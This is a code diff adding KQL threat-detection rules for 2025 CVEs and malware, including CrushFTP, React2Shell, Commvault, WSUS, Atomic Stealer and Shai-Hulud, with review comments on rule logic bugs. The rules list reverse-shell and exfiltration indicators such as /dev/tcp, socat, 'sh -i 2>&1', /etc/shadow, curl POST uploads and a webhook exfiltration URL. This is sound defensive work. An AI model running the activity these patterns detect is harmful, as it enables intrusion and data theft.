diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql new file mode 100644 index 00000000..b2da971c --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql @@ -0,0 +1,12 @@ +// Title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) +// Author: Nisarg Suthar +// Date: 2025-08-01 +// Level: high +// Description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1068, attack.t1190, cve.2025-54309, detection.emerging-threats +// False Positives: +// - Legitimate administrative command execution + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\crushftp.exe" and (((ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe") and FolderPath endswith "\\cmd.exe") or (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe"))) \ No newline at end of file 
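Review bot: The `cmd.exe` branch keys on the substring `/c powershell`, which a quoted or alternative invocation (`/c "powershell`, `/c pwsh`, `/k powershell`) bypasses, even though a directly spawned `powershell.exe` is only caught when the `IEX`/`enc`/`Hidden`/`bypass` conjunction also holds. Matching child images, as the sibling CVE-2025-31161 rule does, is more robust than command-line substrings: add `FolderPath endswith "\\powershell.exe"` and `FolderPath endswith "\\pwsh.exe"` as unconditional children of the CrushFTP parent. Also note this rule anchors on `\\crushftp.exe` while the sibling anchors on `\\crushftpservice.exe`; the two should agree, since a host runs one or the other.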
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql new file mode 100644 index 00000000..2dfa149d --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql 
@@ -0,0 +1,13 @@ +// Title: Linux Suspicious Child Process from Node.js - React2Shell +// Author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali +// Date: 2025-12-05 +// Level: high +// Description: Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell). +// This rule particularly looks for exploitation of vulnerability on Node.js Servers where attackers abuse Node.js child_process module to execute arbitrary system commands. +// When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c ). +// For other methods, the Image field will show the spawned process directly. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-55182 + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains "--experimental-https" or InitiatingProcessCommandLine contains "--experimental-next-config-strip-types" or InitiatingProcessCommandLine contains "/node_modules/next" or InitiatingProcessCommandLine contains "next dev" or InitiatingProcessCommandLine contains "next start" or InitiatingProcessCommandLine contains "node_modules/.bin" or InitiatingProcessCommandLine contains "react-scripts start" or InitiatingProcessCommandLine contains "start-server.js") and InitiatingProcessFolderPath endswith "/node") and (((ProcessCommandLine contains "/dev/tcp/" or ProcessCommandLine contains "/dev/udp/" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "base64" or ProcessCommandLine contains "cat " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "dig" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains 
"IO::Socket::INET" or ProcessCommandLine contains "java" or ProcessCommandLine contains "less " or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mkfifo " or ProcessCommandLine contains "more" or ProcessCommandLine contains "nc " or ProcessCommandLine contains "ncat" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "perl" or ProcessCommandLine contains "php" or ProcessCommandLine contains "ping" or ProcessCommandLine contains "ps -ef" or ProcessCommandLine contains "ps aux" or ProcessCommandLine contains "python" or ProcessCommandLine contains "rcat" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "sh -i 2>&1" or ProcessCommandLine contains "-c id" or ProcessCommandLine contains "socat" or ProcessCommandLine contains "uname" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami") or ((FolderPath endswith "/busybox" or FolderPath endswith "/cat" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/dig" or FolderPath endswith "/head" or FolderPath endswith "/id" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/java" or FolderPath endswith "/less" or FolderPath endswith "/lua" or FolderPath endswith "/more" or FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/netstat" or FolderPath endswith "/nslookup" or FolderPath endswith "/perl" or FolderPath endswith "/ping" or FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/ruby" or FolderPath endswith "/socat" or FolderPath endswith "/tail" or FolderPath endswith "/wget" or FolderPath endswith "/whoami") or FolderPath contains "/python")) or (FolderPath endswith "/sh" and (not(FolderPath endswith "-c"))) or ((FolderPath endswith "-c" and FolderPath endswith "/sh") and 
(ProcessCommandLine contains "/dev/tcp/" or ProcessCommandLine contains "/dev/udp/" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "base64" or ProcessCommandLine contains "cat " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "dig" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "IO::Socket::INET" or ProcessCommandLine contains "java" or ProcessCommandLine contains "less " or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mkfifo " or ProcessCommandLine contains "more" or ProcessCommandLine contains "nc " or ProcessCommandLine contains "ncat" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "perl" or ProcessCommandLine contains "php" or ProcessCommandLine contains "ping" or ProcessCommandLine contains "ps -ef" or ProcessCommandLine contains "ps aux" or ProcessCommandLine contains "python" or ProcessCommandLine contains "rcat" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "sh -i 2>&1" or ProcessCommandLine contains "-c id" or ProcessCommandLine contains "socat" or ProcessCommandLine contains "uname" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql new file mode 100644 index 00000000..9d3f7330 --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql 
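Review bot: The two `sh` branches test `FolderPath endswith "-c"`, but `FolderPath` is the image path and can never end in `-c`, so `(FolderPath endswith "-c" and FolderPath endswith "/sh")` is unsatisfiable and the preceding `(FolderPath endswith "/sh" and not(FolderPath endswith "-c"))` collapses to "any `/bin/sh` child of node" — which is what `child_process.exec()` spawns for every benign command too, so the keyword list guarding the `-c` case never gets to apply. Presumably the distinction was meant on the command line: `(FolderPath endswith "/sh" and not(ProcessCommandLine contains " -c "))` for an interactive shell, and `(FolderPath endswith "/sh" and ProcessCommandLine contains " -c " and (<keyword list>))` for `sh -c <cmd>`. Whether the field mix-up lives in the upstream Sigma rule or in the converter I cannot tell from the hunk; check the source before patching the generated file. Separately, bare substrings like `java`, `more`, `ping`, `dig` and `cat ` in the keyword list match inside unrelated words (`javascript`, `mapping`, `digest`), so expect noise from dev-server child processes.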
@@ -0,0 +1,13 @@
+// Title: Windows Suspicious Child Process from Node.js - React2Shell
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali
+// Date: 2025-12-05
+// Level: high
+// Description: Detects suspicious child processes started by Node.js server processes on Windows, which may indicate exploitation of vulnerabilities like CVE-2025-55182 (React2Shell).
+// Attackers can abuse the Node.js 'child_process' module to run system commands or scripts using methods such as spawn(), exec(), execFile(), fork(), or execSync().
+// If execSync() or exec() is used in the exploit, the command line often shows a shell (e.g., cmd.exe /d /s /c ...) running a suspicious command unless other shells are explicitly invoked.
+// For other methods, the spawned process appears directly in the Image field unless a shell is explicitly used.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-55182
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "--experimental-https" or InitiatingProcessCommandLine contains "--experimental-next-config-strip-types" or InitiatingProcessCommandLine contains "\\node_modules\\next" or InitiatingProcessCommandLine contains "next dev" or InitiatingProcessCommandLine contains "next start" or InitiatingProcessCommandLine contains "next\" start" or InitiatingProcessCommandLine contains "node_modules\\.bin\\\\..\\next" or InitiatingProcessCommandLine contains "react-scripts start" or InitiatingProcessCommandLine contains "start-server.js") and InitiatingProcessFolderPath endswith "\\node.exe") and (((ProcessCommandLine contains "\\net" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil " or ProcessCommandLine contains "conhost --headless" or ProcessCommandLine contains "cscript " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "java" or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "netsh" or ProcessCommandLine contains "nslookup " or ProcessCommandLine contains "perl" or ProcessCommandLine contains "ping " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "python" or ProcessCommandLine contains "reg " or ProcessCommandLine contains "reg.exe" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "sc.exe" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wmic" or ProcessCommandLine contains "wscript") or ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\OpenConsole.exe" or FolderPath endswith "\\perl.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\py.exe" or FolderPath endswith "\\python.exe" or FolderPath endswith "\\pythonw.exe" or FolderPath endswith "\\pyw.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") or FolderPath contains "\\python")) or (FolderPath endswith "\\cmd.exe" and (not(ProcessCommandLine contains "/d /s /c "))) or ((ProcessCommandLine contains "/d /s /c " and FolderPath endswith "\\cmd.exe") and (not((ProcessCommandLine contains "git config --local --get remote.origin.url" or (ProcessCommandLine contains "\\mkcert\\" and ProcessCommandLine contains " -CAROOT") or (ProcessCommandLine contains "\\mkcert\\" and ProcessCommandLine contains " -install ") or (ProcessCommandLine contains "netstat -ano | findstr /C:" and ProcessCommandLine contains " | findstr LISTENING"))))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
new file mode 100644
index 00000000..57830565
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
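Review bot: The parent-command-line term `node_modules\\.bin\\\\..\\next` decodes to two consecutive backslashes after `.bin` (a KQL `\\` escape is one backslash), while the neighbouring `\\node_modules\\next` decodes to single backslashes, so this one term is unlikely to match a real `next` launcher invocation; please confirm against the Sigma source whether a single backslash was intended and, if so, change it to `InitiatingProcessCommandLine contains "node_modules\\.bin\\..\\next"`. If the extra escaping comes from the converter rather than the source rule, fix it there, since this file is regenerated by the weekly workflow. The rest of the parent/child structure reads correctly, and the explicit `/d /s /c` exclusions for git, mkcert and netstat are what keep the `cmd.exe` branch usable on developer hosts.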
@@ -0,0 +1,13 @@
+// Title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: medium
+// Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
+// This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788
+// False Positives:
+// - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "qlogin" and ProcessCommandLine contains "_+_PublicSharingUser_") and ProcessCommandLine matches regex "[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
new file mode 100644
index 00000000..de3a5dc5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
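Review bot: `matches regex` is case-sensitive in KQL, so the `[A-F0-9]` class in the password check only matches upper-case GUIDs, whereas the two `contains` terms before it are case-insensitive; if the Sigma source does not deliberately restrict this to upper case, prefix the pattern with `(?i)` the way the Python Path Configuration File Creation rules in this commit do, i.e. `ProcessCommandLine matches regex "(?i)[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}"`. Either way the header comment should state which case the rule expects, so a tuner does not assume a lower-case GUID would have fired it.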
@@ -0,0 +1,11 @@
+// Title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790)
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: high
+// Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop.
+// This is a post-authentication step corresponding to CVE-2025-57790.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "qoperation" and ProcessCommandLine contains "exec" and ProcessCommandLine contains " -af " and ProcessCommandLine contains ".xml " and ProcessCommandLine contains "\\Apache\\webapps\\ROOT\\" and ProcessCommandLine contains ".jsp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
new file mode 100644
index 00000000..f481a546
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
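Review bot: The description says the rule keys on the `-file` argument, but the `where` clause tests for ` -af ` together with `.xml `, so the header and the detection logic disagree and an analyst triaging a hit will look for the wrong switch. Either the comment should read `// Description: Detects the use of qoperation.exe with the -af argument to write a JSP file to the webroot, indicating a webshell drop.` or the predicate should be re-checked against the Sigma source. Since the KQL is regenerated weekly from Sigma, the correction belongs upstream or in the converter rather than in this file alone.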
@@ -0,0 +1,11 @@
+// Title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791)
+// Author: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: high
+// Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.
+// An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "qlogin" and ProcessCommandLine contains " -cs " and ProcessCommandLine contains " -localadmin" and ProcessCommandLine contains " -clp " and ProcessCommandLine contains "_localadmin__"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
new file mode 100644
index 00000000..08ee0c7b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process
+// Author: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-31
+// Level: high
+// Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
+// This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats
+// False Positives:
+// - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\network service`), or parent process command lines to reduce noise.
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "WsusPool" and InitiatingProcessFolderPath endswith "\\w3wp.exe") or InitiatingProcessFolderPath endswith "\\wsusservice.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql
new file mode 100644
index 00000000..6d5f7945
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql
@@ -0,0 +1,10 @@
+// Title: Atomic MacOS Stealer - FileGrabber Activity
+// Author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
+// Date: 2025-11-22
+// Level: high
+// Description: Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "POST" and ProcessCommandLine contains "user:" and ProcessCommandLine contains "-H " and ProcessCommandLine contains "BuildID" and ProcessCommandLine contains "file=@/tmp/out.zip" and ProcessCommandLine contains "cl: 0") or (ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql
new file mode 100644
index 00000000..51ba564e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql
@@ -0,0 +1,10 @@
+// Title: Atomic MacOS Stealer - Persistence Indicators
+// Author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
+// Date: 2025-11-22
+// Level: high
+// Description: Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1564.001, attack.t1543.004, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath =~ "/Library/LaunchDaemons/com.finder.helper.plist" or (InitiatingProcessFolderPath endswith "/curl" and FolderPath endswith ".helper" and FolderPath startswith "/Users/")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql b/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql
new file mode 100644
index 00000000..bbdd647f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql
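Review bot: `DeviceFileEvents` carries create, modify, rename and delete actions, so a rule whose title and description are about file creation will also fire on the other action types unless it filters on `ActionType`; adding `| where ActionType == "FileCreated"` ahead of the path predicate would make the KQL match the file-creation semantics the header states. The same omission is present in the other file-creation rules in this commit (Shai-Hulud Malicious GitHub Workflow Creation, FunkLocker Ransomware File Creation, Potentially Suspicious Long Filename Pattern, and both Python Path Configuration File Creation rules). If the converter emits `DeviceFileEvents` for the Sigma file_event category without an action filter, the fix belongs in the converter so the weekly regeneration keeps it.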
@@ -0,0 +1,13 @@
+// Title: Grixba Malware Reconnaissance Activity
+// Author: yxinmiracle, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-26
+// Level: high
+// Description: Detects execution of the Grixba reconnaissance tool based on suspicious command-line parameter combinations.
+// This tool is used by the Play ransomware group for network enumeration, data gathering, and event log clearing.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1595.001, attack.discovery, attack.t1046, detection.emerging-threats
+// False Positives:
+// - Legitimate tools that use similar command-line argument structures (e.g., a tool with '--mode scan' and '--input file.txt') could trigger this rule. However, the specific combinations are indicative of reconnaissance or defense evasion.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i " or ProcessCommandLine contains "-input " or ProcessCommandLine contains "-i:" or ProcessCommandLine contains "-input:") and (ProcessCommandLine contains ":f " or ProcessCommandLine contains ":r " or ProcessCommandLine contains ":s " or ProcessCommandLine contains " f " or ProcessCommandLine contains " r " or ProcessCommandLine contains " s ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "-mode " or ProcessCommandLine contains "-m:" or ProcessCommandLine contains "-mode:") and (ProcessCommandLine contains "scan " or ProcessCommandLine contains "scanall ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql
new file mode 100644
index 00000000..efd89ce0
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql
@@ -0,0 +1,14 @@
+// Title: Katz Stealer DLL Loaded
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-05-22
+// Level: high
+// Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants.
+// Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.
+// The process that loads these DLLs are very likely to be malicious.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1129, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\katz_ontop.dll" or FolderPath endswith "\\AppData\\Local\\Temp\\received_dll.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql
new file mode 100644
index 00000000..65049b31
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql
@@ -0,0 +1,12 @@
+// Title: Shai-Hulud Malicious GitHub Workflow Creation
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: high
+// Description: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.credential-access, attack.t1552.001, attack.collection, attack.t1119, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".github/workflows/shai-hulud-workflow.yml"
\ No newline at end of file
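Review bot: The Shai-Hulud workflow rule matches the path with forward slashes only, and on Windows endpoints `FolderPath` in `DeviceFileEvents` is reported with backslashes, so a developer workstation where the worm writes the same file would not match. If the Sigma source is not scoped to Linux/macOS, extend the predicate to `| where FolderPath endswith ".github/workflows/shai-hulud-workflow.yml" or FolderPath endswith "\\.github\\workflows\\shai-hulud-workflow.yml"`. The Katz Stealer image-load rule sharing this line needs no change beyond the header.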
diff --git a/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
new file mode 100644
index 00000000..40984ec0
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
@@ -0,0 +1,12 @@
+// Title: Shai-Hulud NPM Package Malicious Exfiltration via Curl
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: high
+// Description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1041, attack.collection, attack.t1005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "-d" and ProcessCommandLine contains "webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7") and FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql b/KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql
new file mode 100644
index 00000000..61cfef4f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: FunkLocker Ransomware File Creation
+// Author: Saiprashanth Pulisetti ( @Prashanthblogs)
+// Date: 2025-08-08
+// Level: high
+// Description: Detects the creation of files with the ".funksec" extension, which is appended to encrypted files by the FunkLocker ransomware.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".funksec"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql b/KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
new file mode 100644
index 00000000..4da9174c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution
+// Author: Arda Buyukkaya (EclecticIQ)
+// Date: 2025-02-11
+// Level: high
+// Description: Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1090, attack.t1573, attack.t1071.001, attack.t1059.001, attack.s0183, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
